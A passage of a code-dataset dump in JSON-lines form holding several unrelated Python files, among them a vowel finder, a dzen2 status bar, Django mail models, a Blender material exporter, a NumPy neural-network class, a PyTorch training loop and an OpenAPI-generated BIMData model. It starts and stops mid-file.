outcomes[['user','value']].groupby('user').mean().reset_index()\n else:\n measurement = None\n else:\n measurement = None\n\n return measurement\n","sub_path":"socialsim_package/socialsim_package/socialsim/measurements/social_activity.py","file_name":"social_activity.py","file_ext":"py","file_size_in_byte":54059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"26546363","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : ceciliachow\nDate : 2020-02-06\nPurpose: Rock the Casbah\n\"\"\"\n\nimport argparse\nimport os\nimport sys\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"get args\"\"\"\n\n parser = argparse.ArgumentParser(\n description='Find position of vowel in string',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('vowel',\n metavar='str',\n help='A vowel to look for',\n type=str,\n choices=['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U'])\n\n parser.add_argument('text',\n metavar='str',\n type=str,\n help='The text to search')\n\n return parser.parse_args()\n\n # --------------------------------------------------\n\n\ndef main():\n \"\"\"main\"\"\"\n args = get_args()\n count = len(args.text)\n\n for x in range(len(args.text)):\n if args.text[x] == args.vowel:\n print(f'Found \"{args.vowel}\" in \"{args.text}\" at index {x}.')\n count = count - 1\n else:\n continue\n\n if count == len(args.text):\n print(f'\"{args.vowel}\" is not found in \"{args.text}\".')\n\n\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"assignments/01_strings/vpos.py","file_name":"vpos.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"455762883","text":"# https://leetcode.com/problems/unique-paths/description/\nclass Solution(object):\n def uniquePaths(self, m, n):\n \"\"\"\n :type m: int\n :type n: int\n :rtype: int\n \"\"\"\n dp = [[-1 for i in range(n)] for _ in range(m)]\n dp[-1][-1] = 1\n for i in reversed(range(m)):\n for j in reversed(range(n)):\n if dp[i][j] == -1:\n dp[i][j] = dp[i][j+1] if j+1 < n else 0\n dp[i][j] += dp[i+1][j] if i+1< m else 0\n return dp[0][0]\n","sub_path":"unique-paths.py","file_name":"unique-paths.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"549979314","text":"import os\nimport datetime\nimport time\n\nfrom gmc import color\n\n# ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----\n# initialize\n\n# assuming $ herbstclient tag_status\n# \t#1\t:2\t:3\t:4\t.5\t.6\t.7\t.8\t.9\n\n# custom tag names\nTAG_SHOWS = ['一 ichi', '二 ni', '三 san', '四 shi', \n '五 go', '六 roku', '七 shichi', '八 hachi', '九 kyū', '十 jū']\n\n# initialize variable segment\nsegment_windowtitle = '' # empty string\ntags_status = [] # empty list\nsegment_datetime = '' # empty string\n\n# ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----\n# decoration\n\nSEPARATOR = '^bg()^fg(' + color['black'] + ')|^bg()^fg()'\n\n# http://fontawesome.io/\nFONT_AWESOME = '^fn(FontAwesome-9)'\n\n# Powerline Symbol\nRIGHT_HARD_ARROW = '^fn(powerlinesymbols-14)^fn()'\nRIGHT_SOFT_ARROW = '^fn(powerlinesymbols-14)^fn()'\nLEFT_HARD_ARROW = '^fn(powerlinesymbols-14)^fn()'\nLEFT_SOFT_ARROW = '^fn(powerlinesymbols-14)^fn()'\n\n# theme\nPRE_ICON = '^fg(' + color['yellow500'] + ')' + FONT_AWESOME\nPOST_ICON = '^fn()^fg()'\n\n# ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----\n# main\n\ndef get_statusbar_text(monitor):\n text = ''\n\n # draw tags\n for tag_status in tags_status:\n text += output_by_tag(monitor, tag_status)\n\n # draw date and time\n text += output_by_datetime()\n\n # draw window title\n text += output_by_title()\n \n return text\n\n# ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----\n# each segments\n\ndef output_by_tag(monitor, tag_status):\n tag_index = tag_status[1:2]\n tag_mark = tag_status[0:1]\n tag_name = TAG_SHOWS[int(tag_index) - 1] # zero based\n\n # ----- pre tag\n\n if tag_mark == '#':\n text_pre = '^bg(' + color['blue500'] + ')' \\\n '^fg(' + color['black'] + ')' \\\n + RIGHT_HARD_ARROW \\\n + '^bg(' + color['blue500'] + ')' \\\n '^fg(' + color['white'] + ')'\n elif tag_mark == '+':\n text_pre = '^bg(' + color['yellow500'] + ')' \\\n '^fg(' + color['grey400'] + ')'\n elif tag_mark == ':':\n text_pre = '^bg()^fg(' + color['white'] + ')'\n elif tag_mark == '!':\n text_pre = '^bg(' + color['red500'] + ')' \\\n '^fg(' + color['white'] + ')'\n else:\n text_pre = '^bg()^fg(' + color['grey600'] + ')'\n\n \n # ----- tag by number\n \n # assuming using dzen2_svn\n # clickable tags if using SVN dzen\n text_name = '^ca(1,herbstclient focus_monitor \"' \\\n + str(monitor) + '\" && ' + 'herbstclient use \"' \\\n + tag_index + '\") ' + tag_name + ' ^ca() '\n \n # ----- post tag\n\n if tag_mark == '#':\n text_post = '^bg(' + color['black'] + ')' \\\n '^fg(' + color['blue500'] + ')' + RIGHT_HARD_ARROW\n else: \n text_post = ''\n \n return (text_pre + text_name + text_post)\n\ndef output_by_title():\n text = ' ^r(5x0) ' + SEPARATOR + ' ^r(5x0) '\n text += segment_windowtitle\n\n return text\n\ndef output_by_datetime():\n text = ' ^r(5x0) ' + SEPARATOR + ' ^r(5x0) '\n text += segment_datetime\n\n return text\n\n# ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----\n# setting variables, response to event handler\n\ndef set_tag_value(monitor):\n global tags_status\n\n raw = os.popen('herbstclient tag_status ' + str(monitor)).read()\n raw = raw.strip()\n tags_status = raw.split(\"\\t\")\n\ndef set_windowtitle(windowtitle):\n global segment_windowtitle\n icon = PRE_ICON + '' + POST_ICON\n \n segment_windowtitle = ' ' + icon + \\\n ' ^bg()^fg(' + color['grey700'] + ') ' + windowtitle\n\ndef set_datetime():\n global segment_datetime\n now = datetime.datetime.now()\n \n date_icon = PRE_ICON + '' + POST_ICON\n date_format = '{0:%Y-%m-%d}'\n date_str = date_format.format(now)\n date_text = date_icon + ' ^bg()' \\\n + '^fg(' + color['grey700'] + ') ' + date_str\n\n time_icon = PRE_ICON + '' + POST_ICON \n time_format = '{0:%H:%M:%S}'\n time_str = time_format.format(now)\n time_text = time_icon +' ^bg()' \\\n + '^fg(' + color['blue500'] + ') ' + time_str\n\n segment_datetime = date_text + ' ' + time_text\n","sub_path":"standalone/dzen2-hlwm/python/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"119643921","text":"'''\n\nmodels for the ifxmail application; based on odymail\n\ncreated on 11/25/2018\n@author: Aaron Kitzmiller \n@copyright: 2018 The Presidents and Fellows of Harvard College. All rights reserved.\n\n@license: GPL v2.0\n'''\nfrom django.db import models\nfrom author.decorators import with_author\n\n\n@with_author\nclass IfxMessage(models.Model):\n '''\n Model class for standard mail message text.\n '''\n class Meta:\n db_table = \"ifxmessage\"\n\n name = models.CharField(max_length=100, blank=False, unique=True, default=None)\n subject = models.CharField(max_length=500, blank=False, default=None)\n message = models.TextField(blank=False)\n application = models.CharField(max_length=20, blank=False, null=False, default='nice')\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.name\n\n\n@with_author\nclass IfxMailing(models.Model):\n '''\n Model class for a particular mailing.\n Includes message text, list of emails, etc.\n May be linked to rcuser objects\n '''\n class Meta:\n db_table = \"ifxmailing\"\n\n # Comma separated list of email addresses\n # for to, from, cc, bcc\n tostr = models.TextField(blank=False, null=False, default=None)\n fromstr = models.CharField(max_length=100, blank=False, null=False, default=None)\n ccstr = models.TextField(null=True, blank=True)\n bccstr = models.TextField(null=True, blank=True)\n replyto = models.CharField(max_length=100, blank=True, null=True)\n subject = models.CharField(max_length=1000, blank=False, null=False, default=None)\n message = models.TextField(blank=False, null=False, default=None)\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n sent = models.DateTimeField(blank=True, null=True, default=None)\n status = models.CharField(max_length=20, blank=False, default='READY')\n ifxmessage = models.ForeignKey(IfxMessage, blank=True, null=True, default=None, on_delete=models.CASCADE)\n application = models.CharField(max_length=20, blank=False, null=False, default='nice')\n\n def getAttachmentFiles(self):\n '''\n Returns an array of attachment FieldFiles from the IfxMailing via IfxMessage\n '''\n files = []\n if self.ifxmessage:\n for ma in self.ifxmessage.ifxmessageattachment_set.all():\n files.append(ma.file)\n\n return files\n\n\nclass IfxMessageAttachment(models.Model):\n \"\"\"\n Attachment for IfxMessages\n \"\"\"\n\n class Meta:\n db_table = 'ifxmessage_attachment'\n\n name = models.CharField(max_length=100, blank=False, null=False, default=None, unique=True)\n file = models.FileField(upload_to=\"uploads/%Y/%m/%d/\")\n ifxmessage = models.ForeignKey(IfxMessage, on_delete=models.CASCADE)\n\n def __str__(self):\n return '%s - %s' % (self.name, self.file)\n","sub_path":"ifxmail/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"139376323","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@Author: Xiaolele11\n@Time: 2019-01-28 15:20\n@File : pic_read.py\n@Desc : opencv 读取图像\n\"\"\"\n\nimport cv2 as cv\n\n# 读图片\nimg = cv.imread('/Users/jiale/github/ai/data/test.jpg')\n# 图片信息\nprint('图片尺寸:', img.shape)\nprint('图片数据:', type(img), img)\n# 显示图片\ncv.imshow('pic title', img)\ncv.waitKey(0)\n\n# 添加文字\ncv.putText(img, 'Learn Python with Crossin', (50, 150), cv.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 4)\n# 保存图片\ncv.imwrite('img/Lenna_new.png', img)\n","sub_path":"opencv_test/pic_read.py","file_name":"pic_read.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"207718108","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport bpy\nfrom bpy_extras.io_utils import ExportHelper\nfrom bpy.props import BoolProperty, StringProperty, EnumProperty, IntProperty, CollectionProperty, FloatProperty\nfrom ..material import MHMat\nfrom ..utils import hasMaterial, blendMatSave\n\nclass MHS_OT_WriteMaterialOperator(bpy.types.Operator, ExportHelper):\n \"\"\"Write material to MHMAT file\"\"\"\n bl_idname = \"makeskin.write_material\"\n bl_label = \"Write material\"\n bl_options = {'REGISTER'}\n\n filename_ext = '.mhmat'\n\n filter_glob: StringProperty(default='*.mhmat', options={'HIDDEN'})\n\n @classmethod\n def poll(self, context):\n if context.active_object is not None:\n if not hasattr(context.active_object, \"MhObjectType\"):\n return False\n return True\n return False\n\n def execute(self, context):\n\n obj = context.active_object\n\n fnAbsolute = bpy.path.abspath(self.filepath)\n\n if not hasMaterial(obj):\n self.report({'ERROR'}, \"Object does not have a material\")\n return {'FINISHED'}\n\n mhmat = MHMat(obj)\n\n if obj.MhMsName:\n mhmat.settings['name'] = obj.MhMsName\n\n if obj.MhMsTag:\n mhmat.settings['tag'] = obj.MhMsTag\n\n if obj.MhMsDescription:\n mhmat.settings['description'] = obj.MhMsDescription\n\n if obj.MhMsAuthor:\n mhmat.settings['author'] = obj.MhMsAuthor\n\n if obj.MhMsHomepage:\n mhmat.settings['homepage'] = obj.MhMsHomepage\n\n mhmat.settings['license'] = obj.MhMsMatLicense\n mhmat.settings['backfaceCull'] = obj.MhMsBackfaceCull\n mhmat.settings['castShadows'] = obj.MhMsCastShadows\n mhmat.settings['receiveShadows'] = obj.MhMsReceiveShadows\n mhmat.settings['alphaToCoverage'] = obj.MhMsAlphaToCoverage\n mhmat.settings['shadeless'] = obj.MhMsShadeless\n mhmat.settings['wireframe'] = obj.MhMsWireframe\n mhmat.settings['transparent'] = obj.MhMsTransparent\n mhmat.settings['depthless'] = obj.MhMsDepthless\n mhmat.settings['sssEnable'] = obj.MhMsSSSEnable\n mhmat.settings['writeBlendMaterial'] = obj.MhMsWriteBlendMaterial\n\n handling = \"NORMALIZE\"\n if obj.MhMsTextures:\n handling = obj.MhMsTextures\n if handling == \"NORMALIZE\":\n mhmat.copyTextures(fnAbsolute)\n if handling == \"COPY\":\n mhmat.copyTextures(fnAbsolute,normalize=False)\n # If handling is LINK, then paths are already correct\n\n if mhmat.settings[\"normalmapTexture\"]:\n mhmat.shaderConfig[\"normal\"] = True\n if mhmat.settings[\"bumpmapTexture\"]:\n mhmat.shaderConfig[\"bump\"] = True\n if obj.MhMsUseLit and obj.MhMsLitsphere:\n mhmat.litSphere = obj.MhMsLitsphere\n \n ##- Save blend -##\n if mhmat.settings[\"writeBlendMaterial\"]:\n try: matName = obj.material_slots[1].name\n except IndexError:\n msg = \"Object dose not have a second material.\"\n self.report({'ERROR'}, msg)\n raise IndexError(msg)\n \n from pathlib import Path\n path = Path(fnAbsolute).with_suffix('.mat.blend')\n mhmat.settings[\"blendMaterial\"] = path.name+'/materials/'+matName\n blendMatSave(path)\n\n\n with open(fnAbsolute,'w') as f:\n f.write(str(mhmat))\n print(mhmat)\n self.report({'INFO'}, \"A material file was written\")\n\n return {'FINISHED'}\n\n","sub_path":"makeskin/operators/writematerial.py","file_name":"writematerial.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"63024946","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport pandas as pd\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom random import random, seed, randint\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\nfrom sklearn.metrics import confusion_matrix, accuracy_score, roc_auc_score\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\n\ncancer = load_breast_cancer()\n\nnp.random.seed()\ntrainingShare = 0.9\nseed = 1\n\nXTrain, XTest, yTrain, yTest=train_test_split(cancer.data,cancer.target, train_size=trainingShare, \\\n test_size = 1-trainingShare,\n random_state=seed)\nyTrain = np.ravel(yTrain).reshape(-1,1)\nyTest = np.ravel(yTest).reshape(-1,1)\n\n# Input Scaling\nsc = StandardScaler()\nXTrain = sc.fit_transform(XTrain)\nXTest = sc.transform(XTest)\n#PCA dimensionality reduction\n'''\nscaler = StandardScaler()\npca = PCA(n_components=2)\nXTrain= pca.fit(XTrain).transform(XTrain)\nXTest = pca.fit(XTest).transform(XTest)'''\n\nclass Network:\n def __init__(self,Xdata,Ydata,act_func = 'ELU',type_net = 'regression', sizes = [64,64], eta=0.001, lmbd = 0.01, num_iter= 100, n_epochs = 200, batch_size = 20):\n self.eta = eta #Learning rate\n self.num_iter = num_iter #Number of iterations\n #Parameters needed for stochastoc gradient\n self.n_epochs = n_epochs\n row, col = XTrain.shape\n tot_num_samples = row\n self.batch_size = batch_size\n self.batches = int(tot_num_samples/batch_size)\n #Activation function\n self.act_func = act_func\n #Type of network\n self.type_net = type_net\n #Data\n self.Xdata =Xdata\n self.Ydata =Ydata\n self.sizes = sizes #Number of layers\n self.lmbd = lmbd #Regularization parameter\n #Definition of some parameters first for weights and bias\n self.column = [col]\n self.column1 =[int(i) for i in self.column]\n sizes = [int(i) for i in self.sizes]\n self.list0 = np.append(self.column1, self.sizes)\n self.list = np.append(self.list0,1)\n self.list2 = self.list[:-1]\n self.list3 = self.list[1:]\n #Make a loop for weights and biases\n self.listWeights = []\n self.biasesList = []\n for j, columns in enumerate(self.list2):\n #for rows in list3:\n rows = self.list3[j]\n weights = np.zeros((len(self.list2),len(self.list3)))\n weights = np.random.randn(columns, rows)\n self.listWeights.append(weights)\n bias = np.zeros((len(self.list3)))\n bias = np.random.randn(rows)\n self.biasesList.append(bias)\n def sigmoid(self, z):\n return 1/(1 + np.exp(-z))\n #Derivative of sigmoid\n def sigmoid_prime(self,z):\n #Derivative of sigmoid function\n return self.sigmoid(z)*(1-self.sigmoid(z))\n #Definition of tanh function\n def tanh(self,z):\n return np.tanh(z)\n #Derivative of tanh function\n def derivtanh(self,z):\n return (1-(np.tanh(z)**2))\n #Definition of RELU\n def RELU(self, z):\n if (z.all() < 0):\n return 0\n else:\n return z\n #Derivative of RELU function\n def derivRELU(self, z):\n if (z.all() < 0):\n return 0\n else:\n return 1\n #Definition of ELU\n def ELU(self,z):\n if (z.all()<0):\n return alpha*(np.exp(z)-1)\n else:\n return z\n #Derivative of ELU\n def derivELU(self,z):\n if(z.all()<0):\n return (np.exp(z))\n else:\n return 1\n ##Return partial derivative with respect to activation for classification\n def cost_derivative(self, output_activations, Ydata):\n #Return partial derivative with respect to activation\n if (self.type_net) == 'Regression':\n return (output_activations - Ydata)\n else:\n return (output_activations - Ydata)/(output_activations*(1-output_activations))\n #Feed forward\n def feed_forward_train(self,):\n #Define my activation function\n activation = self.Xdata\n zs = []\n ac = [self.Xdata]\n for j, i in enumerate(self.listWeights):\n hidden_bias = self.biasesList[j]\n z = activation@i + hidden_bias\n #z_o = np.matmul(a_h, output_weights) + output_bias\n #z = np.matmul(activation.T, i) + hidden_bias\n zs.append(z) #\n #Specify which activation to use\n if (self.act_func) == 'tanh':\n activation = self.tanh(z)\n elif (self.act_func) == 'RELU':\n activation = self.RELU(z)\n elif (self.act_func) == 'ELU':\n activation = self.ELU(z)\n else:\n activation = self.sigmoid(z)\n # Creat list for weighted sum of inputs.\n ac.append(activation) # Create list for my activations\n return(ac, activation, zs)\n #Back propagation for gradient descent\n def backpropagation(self,):\n #I creat gradient for layer, by layer.\n nabla_w = [] # Creat an empty list for gradient in weight\n nabla_b = [] # Creat an empty list for gradient in bias\n for j, i in enumerate(self.listWeights):\n hidden_bias = self.biasesList[j]\n b = np.zeros(hidden_bias.shape)\n w = np.zeros(i.shape)\n nabla_b.append(nabla_b)\n nabla_w.append(nabla_w)\n #insert values from my feed_forward\n ac, output, zs = self.feed_forward_train()\n #error in output layer\n #Specify which activation to use\n\n if (self.act_func) == 'tanh':\n deriv = self.derivtanh(zs[-1])\n elif (self.act_func) == 'RELU':\n deriv = self.derivRELU(zs[-1])\n elif (self.act_func) == 'ELU':\n deriv = self.derivELU(zs[-1])\n else:\n deriv = self.sigmoid_prime(zs[-1])\n\n delta = self.cost_derivative(ac[-1],self.Ydata) * deriv\n #delta = (ac[-1] - self.Ydata)\n error = delta\n # Gradient bias for output layer\n nabla_b[-1] = np.sum(delta)\n #Gradient weight for weights\n nabla_w[-1] = np.dot(ac[-2].T,delta)\n #calculate gradient for hidden layers\n deltas = [error]\n for l in range(2, len(ac)):\n z = zs[-l]\n if (self.act_func) == 'tanh':\n deriv = self.derivtanh(z)\n elif (self.act_func) == 'RELU':\n deriv = self.derivRELU(z)\n elif (self.act_func) == 'ELU':\n deriv = self.derivELU(z)\n else:\n deriv = self.sigmoid_prime(z)\n sp = deriv\n delta = np.dot(delta,self.listWeights[-l+1].T)*sp\n nabla_b[-l] = np.sum(delta)\n nabla_w[-l] = np.dot(ac[-l-1].T,delta)\n deltas.append(delta)\n #deltas.append(delta)\n return (nabla_b, nabla_w) # I shall put values in stochastic gradient\n #Implement a backpropagation for stochastic gradient descent\n def backpropagation_stochastic(self,):\n #I creat gradient for layer, by layer.\n nabla_w = [] # Creat an empty list for gradient in weight\n nabla_b = [] # Creat an empty list for gradient in bias\n for j, i in enumerate(self.listWeights):\n hidden_bias = self.biasesList[j]\n b = np.zeros(hidden_bias.shape)\n w = np.zeros(i.shape)\n nabla_b.append(nabla_b)\n nabla_w.append(nabla_w)\n #insert values from my feed_forward\n ac, output, zs = self.feed_forward_output(self.Xdata1)\n #error in output layer\n if (self.act_func) == 'tanh':\n deriv = self.derivtanh(zs[-1])\n elif (self.act_func) == 'RELU':\n deriv = self.derivRELU(zs[-1])\n elif (self.act_func) == 'ELU':\n deriv = self.derivELU(zs[-1])\n else:\n deriv = self.sigmoid_prime(zs[-1])\n\n delta = self.cost_derivative(ac[-1],self.Ydata1) * deriv\n # Gradient bias for output layer\n nabla_b[-1] = np.sum(delta)\n #Gradient weight for weights\n nabla_w[-1] = np.dot(ac[-2].T,delta)\n #calculate gradient for hidden layers\n for l in range(2, len(ac)):\n z = zs[-l]\n if (self.act_func) == 'tanh':\n deriv = self.derivtanh(z)\n elif (self.act_func) == 'RELU':\n deriv = self.derivRELU(z)\n elif (self.act_func) == 'ELU':\n deriv = self.derivELU(z)\n else:\n deriv = self.sigmoid_prime(z)\n sp = deriv\n delta = np.dot(delta,self.listWeights[-l+1].T)*sp\n nabla_b[-l] = np.sum(delta)\n nabla_w[-l] = np.dot(ac[-l-1].T,delta)\n #deltas.append(delta)\n return (nabla_b, nabla_w) # I shall put values in stochastic gradient\n #Fitting with stochastic gradient descent\n def fitstoc(self,):\n \trow, col = self.Xdata.shape\n \tdata_indices = np.arange(col) # Define my features\n \tfor epoch in range(self.n_epochs):\n for i in range(self.batches):\n \tchosen_datapoints = np.random.choice(data_indices, size=self.batch_size, replace=False)\n \tself.Xdata1 = self.Xdata[chosen_datapoints]\n \tself.Ydata1 = self.Ydata[chosen_datapoints]\n \tnabla_b, nabla_w = self.backpropagation_stochastic()\n \tfor m, l in enumerate(self.biasesList):\n \t\tdb = nabla_b[m]\n \t\tl -=self.eta*db\n \tdw = []\n \tfor j, k in enumerate(self.listWeights):\n \t\tdwh = nabla_w[j]\n \t\tdwh +=self.lmbd*k\n \t\tdw.append(dwh) # Creat a list for regularized weights\n \t\tk -=self.eta*dwh\n def fitgradient(self,):\n #Define parameters\n for i in range(self.num_iter):\n nabla_b, nabla_w = self.backpropagation()\n for m, l in enumerate(self.biasesList):\n db = nabla_b[m]\n l -= self.eta*db\n dw = []\n for j, k in enumerate(self.listWeights):\n dwh = nabla_w[j]\n dwh += self.lmbd*k\n dw.append(dwh) # Creat a list for regularized weights\n k -=self.eta*dwh\n\n def feed_forward_output(self, XTest):\n #Define my activation function\n activation = XTest\n zs = []\n ac = [XTest]\n for j, i in enumerate(self.listWeights):\n hidden_bias = self.biasesList[j]\n z = activation@i + hidden_bias\n zs.append(z) # Creat list for weighted sum of inputs.\n if (self.act_func) == 'tanh':\n activation = self.tanh(z)\n elif (self.act_func) == 'RELU':\n activation = self.RELU(z)\n elif (self.act_func) == 'ELU':\n activation = self.ELU(z)\n else:\n activation = self.sigmoid(z) #\n ac.append(activation) # Create list for my activations\n return(ac, activation, zs)\n\n def predict(self, XTRAIN,yTRAIN):\n #Call for activation function and call it ypredict\n ac, ypredict, zs = self.feed_forward_output(XTRAIN)\n row, col = ypredict.shape\n #Creat an empty list for my prediction\n\n C = []\n for i in range(0, row):\n if ypredict[i] > 0.5:\n C.append(1)\n else:\n C.append(0)\n #Empty list for testing\n a = []\n C = np.ravel(C).reshape(-1,1)\n for i in range(0, row):\n if C[i] == yTRAIN[i]:\n a.append(1)\n return(len(a)/row)\n #Calculating R2 score\n","sub_path":"SourceCode/CancerData/Neural Network/NN_class.py","file_name":"NN_class.py","file_ext":"py","file_size_in_byte":12032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"389957084","text":"import time, copy, torch\n\ndef train_model(model, dataloader, criterion, optimiser, scheduler, device, dataset_size, num_epochs=10):\n try:\n since = time.time()\n\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n\n for epoch in range(num_epochs):\n print(f'Epoch {epoch+1}/{num_epochs}')\n \n\n for phase in ['train', 'valid']:\n if phase == 'train':\n scheduler.step()\n model.train()\n else:\n model.eval()\n\n running_loss = 0.0\n running_corrects = 0\n\n for data in dataloader[phase]:\n images, metadata, labels = data['image'], data['metaData'], data['label']\n images = images.to(device)\n metadata = matadata.to(device)\n labels = labels.to(device)\n\n optimiser.zero_grad()\n\n with torch.set_grad_enabled(phase=='train'):\n outputs = model((images, metadata))\n _, preds = torch.max(outputs, 1)\n loss = criterion(outputs, labels)\n\n if phase == 'train':\n loss.backward()\n optimiser.step()\n temp1 = loss.item() * images.size(0)\n temp2 = torch.sum(preds==labels.data)\n running_loss += temp1\n running_corrects += temp2\n print('Running loss:{:.4f} Acc: {:.2f}'.format(temp1/images.size(0), temp2*100/images.size(0)), end='\\r')\n epoch_loss = running_loss/dataset_size[phase]\n epoch_acc = running_corrects.double()/dataset_size[phase]\n print('{} Loss: {:.4f} Acc: {:.4f}'.format(phase, epoch_loss,\n epoch_acc*100))\n\n if phase == 'valid' and epoch_acc > best_acc:\n best_acc = epoch_acc\n resume_model_wts = copy.deepcopy(model.state_dict())\n best_model_wts = copy.deepcopy(model.state_dict())\n print('--' * 20)\n print()\n\n time_elapsed = time.time() - since\n print('Training completed in {:.0f}m {:.0f}s'.format(\n time_elapsed//60, time_elapsed%60))\n print('Best valid Acc: {:4f}'.format(best_acc))\n\n model.load_state_dict(best_model_wts)\n except KeyboardInterrupt:\n model.load_state_dict(best_model_wts)\n time_elapsed = time.time() - since\n print('Training completed in {:.0f}m {:.0f}s'.format(\n time_elapsed//60, time_elapsed%60))\n print('Best valid Acc: {:4f}'.format(best_acc))\n return model\n return model","sub_path":"fit_model.py","file_name":"fit_model.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"653538027","text":"# coding: utf-8\n\n\"\"\"\n BIMData API\n\n BIMData API is a tool to interact with your models stored on BIMData’s servers. Through the API, you can manage your projects, the clouds, upload your IFC files and manage them through endpoints. # noqa: E501\n\n The version of the OpenAPI document: v1\n Contact: support@bimdata.io\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom bimdata_api_client.configuration import Configuration\n\n\nclass Topic(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'guid': 'str',\n 'topic_type': 'str',\n 'topic_status': 'str',\n 'title': 'str',\n 'priority': 'str',\n 'labels': 'list[str]',\n 'creation_date': 'datetime',\n 'creation_author': 'str',\n 'modified_date': 'datetime',\n 'modified_author': 'str',\n 'assigned_to': 'str',\n 'reference_links': 'list[str]',\n 'stage': 'str',\n 'description': 'str',\n 'due_date': 'datetime',\n 'ifcs': 'list[int]',\n 'format': 'str',\n 'index': 'int',\n 'project': 'int'\n }\n\n attribute_map = {\n 'guid': 'guid',\n 'topic_type': 'topic_type',\n 'topic_status': 'topic_status',\n 'title': 'title',\n 'priority': 'priority',\n 'labels': 'labels',\n 'creation_date': 'creation_date',\n 'creation_author': 'creation_author',\n 'modified_date': 'modified_date',\n 'modified_author': 'modified_author',\n 'assigned_to': 'assigned_to',\n 'reference_links': 'reference_links',\n 'stage': 'stage',\n 'description': 'description',\n 'due_date': 'due_date',\n 'ifcs': 'ifcs',\n 'format': 'format',\n 'index': 'index',\n 'project': 'project'\n }\n\n def __init__(self, guid=None, topic_type=None, topic_status=None, title=None, priority=None, labels=None, creation_date=None, creation_author=None, modified_date=None, modified_author=None, assigned_to=None, reference_links=None, stage=None, description=None, due_date=None, ifcs=None, format=None, index=None, project=None, local_vars_configuration=None): # noqa: E501\n \"\"\"Topic - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._guid = None\n self._topic_type = None\n self._topic_status = None\n self._title = None\n self._priority = None\n self._labels = None\n self._creation_date = None\n self._creation_author = None\n self._modified_date = None\n self._modified_author = None\n self._assigned_to = None\n self._reference_links = None\n self._stage = None\n self._description = None\n self._due_date = None\n self._ifcs = None\n self._format = None\n self._index = None\n self._project = None\n self.discriminator = None\n\n if guid is not None:\n self.guid = guid\n self.topic_type = topic_type\n self.topic_status = topic_status\n self.title = title\n self.priority = priority\n self.labels = labels\n if creation_date is not None:\n self.creation_date = creation_date\n self.creation_author = creation_author\n if modified_date is not None:\n self.modified_date = modified_date\n self.modified_author = modified_author\n self.assigned_to = assigned_to\n self.reference_links = reference_links\n self.stage = stage\n self.description = description\n self.due_date = due_date\n if ifcs is not None:\n self.ifcs = ifcs\n if format is not None:\n self.format = format\n self.index = index\n self.project = project\n\n @property\n def guid(self):\n \"\"\"Gets the guid of this Topic. # noqa: E501\n\n\n :return: The guid of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._guid\n\n @guid.setter\n def guid(self, guid):\n \"\"\"Sets the guid of this Topic.\n\n\n :param guid: The guid of this Topic. # noqa: E501\n :type: str\n \"\"\"\n\n self._guid = guid\n\n @property\n def topic_type(self):\n \"\"\"Gets the topic_type of this Topic. # noqa: E501\n\n\n :return: The topic_type of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._topic_type\n\n @topic_type.setter\n def topic_type(self, topic_type):\n \"\"\"Sets the topic_type of this Topic.\n\n\n :param topic_type: The topic_type of this Topic. # noqa: E501\n :type: str\n \"\"\"\n\n self._topic_type = topic_type\n\n @property\n def topic_status(self):\n \"\"\"Gets the topic_status of this Topic. # noqa: 